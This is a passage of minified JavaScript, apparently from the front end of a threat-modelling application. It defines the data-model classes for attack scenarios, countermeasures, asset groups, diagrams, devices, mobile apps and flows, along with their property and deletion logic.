null==a||a.GetCountermeasures().filter(n=>n.AttackScenarios.includes(this)).forEach(n=>i.push({Type:li.RemoveAttackScenarioFromCountermeasure,Param:n})),null==a||a.GetAttackScenarios().filter(n=>n.LinkedScenarios.includes(this)).forEach(n=>i.push({Type:li.RemoveAttackScenarioFromAttackScenario,Param:n})),null==a||a.GetTestCases().filter(n=>n.LinkedScenarios.includes(this)).forEach(n=>i.push({Type:li.RemoveAttackScenarioFromTestCase,Param:n})),i}OnDelete(a,e){this.MappingState=zn.Removed,this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveAttackScenarioFromCountermeasure?n.Param.RemoveAttackScenario(this.ID):(n.Type==li.RemoveAttackScenarioFromAttackScenario||n.Type==li.RemoveAttackScenarioFromTestCase)&&n.Param.RemoveLinkedAttackScenario(this.ID)})}static FromJSON(a,e,i){return new Rc(a,e,i)}}var dr=(()=>{return(t=dr||(dr={}))[t.Low=1]="Low",t[t.Medium=2]="Medium",t[t.High=3]="High",dr;var t})();class An{static GetKeys(){return[dr.Low,dr.Medium,dr.High]}static ToString(a){switch(a){case dr.Low:return"general.Low";case dr.Medium:return"general.Medium";case dr.High:return"general.High"}}}class Pu extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Sensitivity||(this.Sensitivity=dr.Medium),this.ImpactCats||(this.Data.ImpactCats=[])}get IsProjectData(){return null!=this.project}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get IsNewAsset(){return this.Data.IsNewAsset}set IsNewAsset(a){this.Data.IsNewAsset=a,a&&(this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"),this.properties.splice(2,0,this.properties.splice(this.GetProperties().length-1,1)[0]),this.properties.splice(this.GetProperties().findIndex(e=>e.Type==Ii.AssignNumberToAsset),1))}get Sensitivity(){return this.Data.Sensitivity}set Sensitivity(a){this.Data.Sensitivity=a&&Number(a)}get ImpactCats(){return this.Data.ImpactCats}FindAssetGroup(){return this.project?this.project.GetAssetGroups().find(a=>a.AssociatedData.includes(this)):this.config.GetAssetGroups().find(a=>a.AssociatedData.includes(this))}CheckUniqueNumber(){return this.project.GetMyDatas().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"A"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){return[]}OnDelete(a,e){let n=(this.IsProjectData?a:e).GetAssetGroups().find(r=>r.AssociatedData.includes(this));n&&n.RemoveMyData(this)}initProperties(){super.initProperties(),this.IsNewAsset?this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"):this.AddProperty("general.Number","","",!1,Ii.AssignNumberToAsset,!0),this.AddProperty("properties.Sensitivity","Sensitivity","",!0,Ii.LowMediumHighSelect,!0),Vs.GetKeys().forEach(a=>this.AddProperty(Vs.ToString(a),"ImpactCats-"+a.toString(),"",!1,Ii.ImpactCategory,!0,!1))}static FromJSON(a,e,i){return new Pu(a,e,i)}}let Zl=(()=>{class t extends Ln{constructor(e,i,n){super(e),this.project=i,this.config=n,this.Data.assetGroupIDs||(this.Data.assetGroupIDs=[]),this.Data.associatedDataIDs||(this.Data.associatedDataIDs=[]),this.ImpactCats||(this.Data.ImpactCats=[]),null==this.IsActive&&(this.IsActive=!0)}get file(){return this.IsProjectAsset?this.project:this.config}get IsProjectAsset(){return null!=this.project}get IsActive(){return this.Data.IsActive}set IsActive(e){this.Data.IsActive=e,e&&this.Parent?this.Parent.IsActive=e:e||this.SubGroups.forEach(i=>i.IsActive=e)}get Number(){return this.Data.Number}set Number(e){this.Data.Number=e&&String(e)}get IsNewAsset(){return this.Data.IsNewAsset}set IsNewAsset(e){this.Data.IsNewAsset=e,e&&(this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"),this.properties.splice(2,0,this.properties.splice(this.GetProperties().length-1,1)[0]),this.properties.splice(this.GetProperties().findIndex(i=>i.Type==Ii.AssignNumberToAsset),1))}get SubGroups(){let e=[];return this.Data.assetGroupIDs.forEach(i=>e.push(this.file.GetAssetGroup(i))),e}get AssociatedData(){let e=[];return this.Data.associatedDataIDs.forEach(i=>e.push(this.file.GetMyData(i))),e}set AssociatedData(e){this.Data.associatedDataIDs=null==e?void 0:e.map(i=>i.ID)}get Parent(){return this.file.GetAssetGroups().find(e=>e.SubGroups.includes(this))}get ImpactCats(){return this.Data.ImpactCats}AddAssetGroup(e){this.SubGroups.includes(e)||this.Data.assetGroupIDs.push(e.ID)}RemoveAssetGroup(e){this.SubGroups.includes(e)&&this.Data.assetGroupIDs.splice(this.Data.assetGroupIDs.indexOf(e.ID),1)}AddMyData(e){this.AssociatedData.includes(e)||this.Data.associatedDataIDs.push(e.ID)}RemoveMyData(e){this.AssociatedData.includes(e)&&this.Data.associatedDataIDs.splice(this.Data.associatedDataIDs.indexOf(e.ID),1)}GetMyDataFlat(){let e=[];return e.push(...this.AssociatedData),this.SubGroups.forEach(i=>e.push(...i.GetMyDataFlat())),e}GetGroupsFlat(){let e=[];return this.SubGroups.forEach(i=>{e.push(i),e.push(...i.GetGroupsFlat())}),e}CheckUniqueNumber(){return this.project.GetAssetGroups().some(e=>e.Number==this.Number&&e.ID!=this.ID)}GetLongName(){return"A"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(e,i){let n=[];return this.AssociatedData.forEach(r=>n.push({Type:li.DeleteMyData,Param:r})),this.SubGroups.forEach(r=>n.push({Type:li.DeleteAssetGroup,Param:r})),n}OnDelete(e,i){let n=this.file.GetAssetGroups().find(c=>c.SubGroups.includes(this));n&&n.RemoveAssetGroup(this),this.FindReferences(e,i).forEach(c=>{c.Type==li.DeleteMyData?this.file.DeleteMyData(c.Param):c.Type==li.DeleteAssetGroup&&this.file.DeleteAssetGroup(c.Param)})}initProperties(){super.initProperties(),this.IsNewAsset?this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"):this.AddProperty("general.Number","","",!1,Ii.AssignNumberToAsset,!0),this.AddProperty("properties.IsActive","IsActive","",!0,Ii.CheckBox,!0),Vs.GetKeys().forEach(e=>this.AddProperty(Vs.ToString(e),"ImpactCats-"+e.toString(),"",!1,Ii.ImpactCategory,!0,!1))}static FromJSON(e,i,n){return new t(e,i,n)}}return t.Icon="account_balance",t})();var xn=(()=>{return(t=xn||(xn={})).Hardware="HW",t.DataFlow="DF",t.Context="CTX",t.UseCase="UC",xn;var t})();class ns extends Ln{constructor(a,e,i){super(a),this.project=e,this.Settings||(this.Settings={GenerationThreatLibrary:!0,GenerationAssetBased:!1,GenerationMnemonics:{},GenerationRules:{}}),this.Settings.GenerationMnemonics||(this.Settings.GenerationMnemonics={}),this.Settings.GenerationRules||(this.Settings.GenerationRules={})}get elementsID(){return this.Data.elementsID}set elementsID(a){this.Data.elementsID=a}get Name(){return this.Data.Name}set Name(a){this.Data.Name=a,this.Elements&&(this.Elements.Name=a),this.NameChanged.emit(a)}get Canvas(){return this.Data.Canvas}set Canvas(a){a!=this.Data.Canvas&&(this.Data.Canvas=a)}get DiagramType(){return this.Data.DiagramType}set DiagramType(a){this.Data.DiagramType=a}get Settings(){return this.Data.Settings}set Settings(a){this.Data.Settings=a}static FromJSON(a,e,i){return a.DiagramType==xn.Hardware||a.DiagramType==xn.DataFlow?new Vg(a,e,i):a.DiagramType==xn.Context||a.DiagramType==xn.UseCase?new b2(a,e,i):void 0}}class Vg extends ns{get Elements(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDFDElement(this.elementsID)}constructor(a,e,i){if(super(a,e,i),!this.Elements){let n=new Ys({},Ys.GetDefaultType(i),e,i);e.AddDFDElement(n),this.elementsID=n.ID}}FindReferences(a,e){let i=[];return this.Elements.GetChildrenFlat().forEach(n=>{i.push({Type:li.DeleteDFDElement,Param:n})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteDFDElement&&a.DeleteDDFElement(n.Param)}),a.DeleteDDFElement(this.Elements)}static FromJSON(a,e,i){return new Vg(a,e,i)}}class b2 extends ns{get Elements(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetContextElement(this.elementsID)}get IsUseCaseDiagram(){return this.Data.IsUseCaseDiagram}set IsUseCaseDiagram(a){this.Data.IsUseCaseDiagram=a}constructor(a,e,i){if(super(a,e,i),!this.elementsID){let n=new sf({},e,i);e.AddContextElement(n),this.elementsID=n.ID}}FindReferences(a,e){return[]}OnDelete(a,e){}}class pT extends Ln{constructor(a,e,i){super(a),this.project=e,this.Data.contextDiagramID||(this.ContextDiagram=e.CreateDiagram(xn.Context),this.ContextDiagram.Name="System Context",this.ContextDiagram.Elements.Name="System Context Diagram"),this.Data.useCaseDiagramID||(this.UseCaseDiagram=e.CreateDiagram(xn.UseCase),this.UseCaseDiagram.Name="Use Cases",this.UseCaseDiagram.Elements.Name="Use Case Diagram"),this.UseCaseDiagram&&(this.UseCaseDiagram.IsUseCaseDiagram=!0)}get ContextDiagram(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDiagram(this.Data.contextDiagramID)}set ContextDiagram(a){this.Data.contextDiagramID=a.ID}get UseCaseDiagram(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDiagram(this.Data.useCaseDiagramID)}set UseCaseDiagram(a){this.Data.useCaseDiagramID=a.ID}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new pT(a,e,i)}}var Aa=(()=>{return(t=Aa||(Aa={}))[t.None=0]="None",t[t.Device=1]="Device",t[t.Interface=2]="Interface",t[t.Interactor=3]="Interactor",t[t.UseCase=4]="UseCase",t[t.Flow=5]="Flow",t[t.TrustArea=6]="TrustArea",t[t.MobileApp=7]="MobileApp",t[t.ExternalEntity=8]="ExternalEntity",Aa;var t})();class nM{static Constructor(a){switch(a){case Aa.Device:return Ou;case Aa.MobileApp:return cf;case Aa.Interface:return DG;case Aa.Interactor:return vG;case Aa.UseCase:return b5;case Aa.Flow:return M2;case Aa.TrustArea:return sf;case Aa.ExternalEntity:return xG;default:return console.error("Missing Element Type in ContextElementTypeUtil.Constructor()",a),null}}static ToString(a){switch(a){case Aa.Device:return"Device";case Aa.MobileApp:return"App";case Aa.Interface:return"Device Interface";case Aa.Interactor:return"Interactor";case Aa.UseCase:return"Use Case";case Aa.Flow:return"Flow";case Aa.TrustArea:return"Trust Area";case Aa.ExternalEntity:return"External Entity";case Aa.None:return"Container";default:return console.error("Missing Element Type in ContextElementTypeUtil.ToString()",a),null}}}class os extends Np{constructor(a,e,i,n){var r;super(a),this.TypeChanged=new Tt,this.project=i,this.Type=e,0==(null===(r=this.Name)||void 0===r?void 0:r.length)&&(this.Name=i?Gi.FindUniqueName(nM.ToString(e),i.GetContextElements().map(c=>c.GetProperty("Name"))):e.toString())}get Type(){return this.Data.Type}set Type(a){this.Data.Type=a,this.TypeChanged.emit(a)}get Parent(){return this.project.GetContextElement(this.Data.parentID)||null}set Parent(a){this.Parent&&this.Parent.ID!=a.ID&&this.Parent.RemoveChild(this),this.Data.parentID=a.ID}FindReferences(a,e){let i=super.FindReferences(a,e);return null==a||a.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).forEach(n=>i.push({Type:li.DeleteElementReferences,Param:n})),null==a||a.GetContextElements().filter(n=>{var r,c;return n instanceof M2&&[null===(r=n.Sender)||void 0===r?void 0:r.ID,null===(c=n.Receiver)||void 0===c?void 0:c.ID].includes(this.ID)}).forEach(n=>i.push({Type:li.DeleteContextFlow,Param:n})),i}OnDelete(a,e){super.OnDelete(a,e),this.FindReferences(a,e).forEach(n=>{(n.Type==li.DeleteElementReferences||n.Type==li.DeleteContextFlow)&&a.DeleteContextElement(n.Param)}),null!=this.Parent&&this.Parent.RemoveChild(this)}static Instantiate(a,e,i){return new(nM.Constructor(a))({},e,i)}static FromJSON(a,e,i){let n,r=a.Type;if(a.refID)n=new Ts(a,a.Type,e,i);else if(r==Aa.Device)n=new Ou(a,e,i);else if(r==Aa.MobileApp)n=new cf(a,e,i);else if(r==Aa.Interface)n=new DG(a,e,i);else if(r==Aa.Interactor)n=new vG(a,e,i);else if(r==Aa.UseCase)n=new b5(a,e,i);else if(r==Aa.Flow)n=new M2(a,e,i);else if(r==Aa.ExternalEntity)n=new xG(a,e,i);else{if(r!=Aa.None)throw new Error("Unknown Type: "+a.Type);n=new sf(a,e,i)}return n}}var So=(()=>{return(t=So||(So={})).None="properties.deviceinterfacenames.None",t.HumanInterface="properties.deviceinterfacenames.HumanInterface",t.MachineInterface="properties.deviceinterfacenames.MachineInterface",t.Environment="properties.deviceinterfacenames.Environment",So;var t})();let Ou=(()=>{class t extends os{constructor(e,i,n){if(super(e,Aa.Device,i,n),this.DeviceInterfaceNameChanged=new Tt,!this.Data.assetGroupID){let r=i.InitializeNewAssetGroup(n);this.Data.assetGroupID=r.ID}this.Data.hardwareDiagramID||(this.HardwareDiagram=i.CreateDiagram(xn.Hardware)),this.Data.softwareStackID||this.CreateSoftwareStack(),0==i.GetDevices().length&&!this.Data.processStackID&&this.CreateProcessStack(),this.Data.checklistIDs||(this.Data.checklistIDs=[]),null==this.InterfaceTop&&(this.InterfaceTop=So.None,this.InterfaceRight=So.MachineInterface,this.InterfaceBottom=So.Environment,this.InterfaceLeft=So.HumanInterface),this.Name=this.Name}get Name(){return this.Data.Name}set Name(e){this.Data.Name=e,null!=this.HardwareDiagram&&(this.HardwareDiagram.Name=this.Name+"'s Hardware"),null!=this.SoftwareStack&&(this.SoftwareStack.Name=this.Name+"'s Software"),null!=this.ProcessStack&&(this.ProcessStack.Name=this.Name+"'s Processes"),this.NameChanged.emit(e)}get AssetGroup(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetAssetGroup(this.Data.assetGroupID)}get HardwareDiagram(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetDiagram(this.Data.hardwareDiagramID)}set HardwareDiagram(e){this.Data.hardwareDiagramID=e.ID}get SoftwareStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.softwareStackID)}set SoftwareStack(e){this.Data.softwareStackID=e.ID}get ProcessStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.processStackID)}set ProcessStack(e){this.Data.processStackID=e.ID}get InterfaceTop(){return this.Data.InterfaceTop}set InterfaceTop(e){this.Data.InterfaceTop=e,this.DeviceInterfaceNameChanged.emit()}get InterfaceRight(){return this.Data.InterfaceRight}set InterfaceRight(e){this.Data.InterfaceRight=e,this.DeviceInterfaceNameChanged.emit()}get InterfaceBottom(){return this.Data.InterfaceBottom}set InterfaceBottom(e){this.Data.InterfaceBottom=e,this.DeviceInterfaceNameChanged.emit()}get InterfaceLeft(){return this.Data.InterfaceLeft}set InterfaceLeft(e){this.Data.InterfaceLeft=e,this.DeviceInterfaceNameChanged.emit()}get Checklists(){let e=[];return this.Data.checklistIDs.forEach(i=>e.push(this.project.GetChecklist(i))),e}set Checklists(e){this.Data.checklistIDs=null==e?void 0:e.map(i=>i.ID)}CreateSoftwareStack(){return this.SoftwareStack||(this.SoftwareStack=this.project.CreateStack(zr.Software),this.project.Config.GetMyComponentSWTypeGroups().forEach(e=>e.Types.forEach(i=>this.SoftwareStack.AddChild(this.project.CreateComponent(i)))),this.SoftwareStack.Name=this.Name+"'s Software"),this.SoftwareStack}DeleteSoftwareStack(){this.project.DeleteStack(this.SoftwareStack)}CreateProcessStack(){return this.ProcessStack||(this.ProcessStack=this.project.CreateStack(zr.Process),this.project.Config.GetMyComponentPTypeGroups().forEach(e=>e.Types.forEach(i=>this.ProcessStack.AddChild(this.project.CreateComponent(i)))),this.ProcessStack.Name=this.Name+"'s Processes"),this.ProcessStack}DeleteProcessStack(){this.project.DeleteStack(this.ProcessStack)}AddChecklist(e){this.Checklists.includes(e)||this.Data.checklistIDs.push(e.ID)}RemoveChecklist(e){this.Checklists.includes(e)&&this.Data.checklistIDs.splice(this.Data.checklistIDs.indexOf(e.ID),1)}GetAttackScenariosApplicable(){let e=[];this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.HardwareDiagram&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.HardwareDiagram.ID)),this.SoftwareStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}GetCountermeasuresApplicable(){let e=[];this.project.GetCountermeasures().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.HardwareDiagram&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.HardwareDiagram.ID)),this.SoftwareStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}FindReferences(e,i){let n=super.FindReferences(e,i);return this.HardwareDiagram&&n.push({Type:li.DeleteDiagram,Param:this.HardwareDiagram}),this.SoftwareStack&&n.push({Type:li.DeleteStack,Param:this.SoftwareStack}),this.ProcessStack&&n.push({Type:li.DeleteStack,Param:this.ProcessStack}),this.AssetGroup&&n.push({Type:li.DeleteAssetGroup,Param:this.AssetGroup}),this.Checklists.forEach(r=>n.push({Type:li.DeleteChecklist,Param:r})),n}OnDelete(e,i){super.OnDelete(e,i),this.FindReferences(e,i).forEach(r=>{r.Type==li.DeleteDiagram?e.DeleteDiagram(r.Param):r.Type==li.DeleteStack?e.DeleteStack(r.Param):r.Type==li.DeleteAssetGroup?e.DeleteAssetGroup(r.Param):r.Type==li.DeleteChecklist&&e.DeleteChecklist(r.Param)})}initProperties(){super.initProperties(),this.AddProperty("properties.InterfaceTop","InterfaceTop","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceRight","InterfaceRight","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceBottom","InterfaceBottom","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceLeft","InterfaceLeft","",!0,Ii.DevInterfaceName,!0)}}return t.Icon="memory",t})();class sf extends os{constructor(a,e,i){super(a,Aa.None,e,i),this.ChildrenChanged=new Tt,this.Data.childrenIDs||(this.Data.childrenIDs=[])}get children(){let a=[];return this.Data.childrenIDs.forEach(e=>a.push(this.project.GetContextElement(e))),a.sort((e,i)=>e.GroupId>=i.GroupId?1:-1)}get Root(){return this.project.GetContextElement(this.Data.rootID)}set Root(a){this.Data.rootID=null==a?void 0:a.ID}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}AddChild(a){null!=a?this.Data.childrenIDs.includes(a.ID)||(this.Data.childrenIDs.push(a.ID),a.Parent=this,this.project.AddContextElement(a),a instanceof sf&&(a.Root=this.Root?this.Root:this),this.Root?this.Root.ChildrenChanged.emit(!0):this.ChildrenChanged.emit(!0)):console.error("child undefined")}RemoveChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}DeleteChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.project.DeleteContextElement(a),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}GetChildren(){return this.children}GetChildrenFlat(){let a=[];return a.push(...this.GetChildren()),this.GetChildren().forEach(e=>{e instanceof sf&&a.push(...e.GetChildrenFlat())}),a}FindReferences(a,e){let i=super.FindReferences(a,e);return this.children.length>0&&i.push({Type:li.MoveChildElements,Param:this.Parent}),i}OnDelete(a,e){super.OnDelete(a,e),this.FindReferences(a,e).forEach(n=>{n.Type==li.MoveChildElements&&this.GetChildren().forEach(r=>this.Parent.AddChild(r))})}}class vG extends os{constructor(a,e,i){super(a,Aa.Interactor,e,i)}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}}var ed=(()=>{return(t=ed||(ed={}))[t.Solid=1]="Solid",t[t.Dashed=2]="Dashed",ed;var t})();class AG{static GetKeys(){return[ed.Solid,ed.Dashed]}static ToString(a){switch(a){case ed.Solid:return"properties.Solid";case ed.Dashed:return"properties.Dashed"}}}var wn=(()=>{return(t=wn||(wn={}))[t.Start=1]="Start",t[t.End=2]="End",t[t.Both=3]="Both",t[t.Initiator=4]="Initiator",t[t.None=5]="None",wn;var t})();class TG{static GetKeys(){return[wn.Start,wn.End,wn.Both,wn.Initiator,wn.None]}static ToString(a){switch(a){case wn.Start:return"properties.flowarrowpositions.Start";case wn.End:return"properties.flowarrowpositions.End";case wn.Both:return"properties.flowarrowpositions.Both";case wn.Initiator:return"properties.flowarrowpositions.Initiator";case wn.None:return"properties.flowarrowpositions.None"}}}var Xs=(()=>{return(t=Xs||(Xs={}))[t.Normal=1]="Normal",t[t.Extend=2]="Extend",t[t.Include=3]="Include",Xs;var t})();class EG{static GetKeys(){return[Xs.Normal,Xs.Extend,Xs.Include]}static ToString(a){switch(a){case Xs.Normal:return"properties.Normal";case Xs.Extend:return"properties.Extend";case Xs.Include:return"properties.Include"}}}class M2 extends os{constructor(a,e,i){super(a,Aa.Flow,e,i),this.LineTypeChanged=new Tt,this.ArrowPosChanged=new Tt,this.BendFlowChanged=new Tt,this.DirectionChanged=new Tt,this.AnchorChanged=new Tt,this.Data.FlowType||(this.FlowType=Xs.Normal),this.Data.LineType||(this.LineType=ed.Solid),this.Data.ArrowPos||(this.ArrowPos=wn.End),null==this.Data.ShowName&&(this.ShowName=!1)}get Sender(){return this.project.GetContextElement(this.Data.senderID)}set Sender(a){this.Data.senderID=null==a?void 0:a.ID}get Receiver(){return this.project.GetContextElement(this.Data.receiverID)}set Receiver(a){this.Data.receiverID=null==a?void 0:a.ID}get FlowType(){return this.Data.FlowType}set FlowType(a){this.Data.FlowType=Number(a),a==Xs.Extend||a==Xs.Include?(this.ShowName=!0,this.LineType=ed.Dashed,this.ArrowPos=a==Xs.Extend?wn.Start:wn.End):(this.ShowName=!1,this.LineType=ed.Solid,this.ArrowPos=wn.End),this.NameChanged.emit(this.Name)}get ShowName(){return this.Data.ShowName}set ShowName(a){this.Data.ShowName=a,this.NameChanged.emit(this.GetProperty("Name"))}get BendFlow(){return this.Data.BendFlow}set BendFlow(a){this.Data.BendFlow=a,this.BendFlowChanged.emit(a)}get LineType(){return this.Data.LineType}set LineType(a){this.Data.LineType=Number(a),this.LineTypeChanged.emit(a)}get ArrowPos(){return this.Data.ArrowPos}set ArrowPos(a){this.Data.ArrowPos=Number(a),this.ArrowPosChanged.emit(a)}ChangeDirection(){let a=this.Sender;this.Sender=this.Receiver,this.Receiver=a,this.DirectionChanged.emit()}initProperties(){super.initProperties(),this.AddProperty("properties.Sender","Sender","",!0,Ii.ElementName,!0),this.AddProperty("properties.Receiver","Receiver","",!0,Ii.ElementName,!0),this.AddProperty("properties.Direction","","",!1,Ii.DataFlowChangeDirection,!0),this.AddProperty("properties.FlowType","FlowType","",!0,Ii.FlowType,!0),this.AddProperty("properties.ShowName","ShowName","",!0,Ii.CheckBox,!0),this.AddProperty("properties.BendFlow","BendFlow","",!0,Ii.CheckBox,!0),this.AddProperty("properties.LineType","LineType","",!0,Ii.LineType,!0),this.AddProperty("properties.ArrowPos","ArrowPos","",!0,Ii.ArrowPosition,!0)}}class DG extends os{constructor(a,e,i){super(a,Aa.Interface,e,i)}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}}class b5 extends os{get DataFlowDiagramID(){return this.Data.dataFlowDiagramID}set DataFlowDiagramID(a){this.Data.dataFlowDiagramID=a}constructor(a,e,i){super(a,Aa.UseCase,e,i)}initProperties(){super.initProperties(),this.AddProperty("properties.DataFlowDiagram","DataFlowDiagramID","properties.DataFlowDiagram.tt",!0,Ii.DataFlowDiagramReference,!0),this.AddProperty("properties.OpenDataFlowDiagram","DataFlowDiagramID","",!0,Ii.DataFlowDiagramReference,!1)}}let cf=(()=>{class t extends os{constructor(e,i,n){if(super(e,Aa.MobileApp,i,n),this.MobileAppInterfaceNameChanged=new Tt,!this.Data.assetGroupID){let r=i.InitializeNewAssetGroup(n);this.Data.assetGroupID=r.ID}this.Data.checklistIDs||(this.Data.checklistIDs=[]),null==this.InterfaceTop&&(this.InterfaceTop=So.None,this.InterfaceRight=So.MachineInterface,this.InterfaceBottom=So.None,this.InterfaceLeft=So.HumanInterface),this.Name=this.Name}get Name(){return this.Data.Name}set Name(e){this.Data.Name=e,null!=this.SoftwareStack&&(this.SoftwareStack.Name=this.Name+"'s Software"),null!=this.ProcessStack&&(this.ProcessStack.Name=this.Name+"'s Processes"),this.NameChanged.emit(e)}get AssetGroup(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetAssetGroup(this.Data.assetGroupID)}get SoftwareStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.softwareStackID)}set SoftwareStack(e){this.Data.softwareStackID=e.ID}get ProcessStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.processStackID)}set ProcessStack(e){this.Data.processStackID=e.ID}get InterfaceTop(){return this.Data.InterfaceTop}set InterfaceTop(e){this.Data.InterfaceTop=e,this.MobileAppInterfaceNameChanged.emit()}get InterfaceRight(){return this.Data.InterfaceRight}set InterfaceRight(e){this.Data.InterfaceRight=e,this.MobileAppInterfaceNameChanged.emit()}get InterfaceBottom(){return this.Data.InterfaceBottom}set InterfaceBottom(e){this.Data.InterfaceBottom=e,this.MobileAppInterfaceNameChanged.emit()}get InterfaceLeft(){return this.Data.InterfaceLeft}set InterfaceLeft(e){this.Data.InterfaceLeft=e,this.MobileAppInterfaceNameChanged.emit()}get Checklists(){let e=[];return this.Data.checklistIDs.forEach(i=>e.push(this.project.GetChecklist(i))),e}set Checklists(e){this.Data.checklistIDs=null==e?void 0:e.map(i=>i.ID)}CreateSoftwareStack(){return this.SoftwareStack||(this.SoftwareStack=this.project.CreateStack(zr.Software)),this.SoftwareStack}DeleteSoftwareStack(){this.project.DeleteStack(this.SoftwareStack)}CreateProcessStack(){return this.ProcessStack||(this.ProcessStack=this.project.CreateStack(zr.Process),this.project.Config.GetMyComponentPTypeGroups().forEach(e=>e.Types.forEach(i=>this.ProcessStack.AddChild(this.project.CreateComponent(i))))),this.ProcessStack}DeleteProcessStack(){this.project.DeleteStack(this.ProcessStack)}AddChecklist(e){this.Checklists.includes(e)||this.Data.checklistIDs.push(e.ID)}RemoveChecklist(e){this.Checklists.includes(e)&&this.Data.checklistIDs.splice(this.Data.checklistIDs.indexOf(e.ID),1)}GetAttackScenariosApplicable(){let e=[];this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.SoftwareStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}GetCountermeasuresApplicable(){let e=[];this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.SoftwareStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}FindReferences(e,i){let n=super.FindReferences(e,i);return 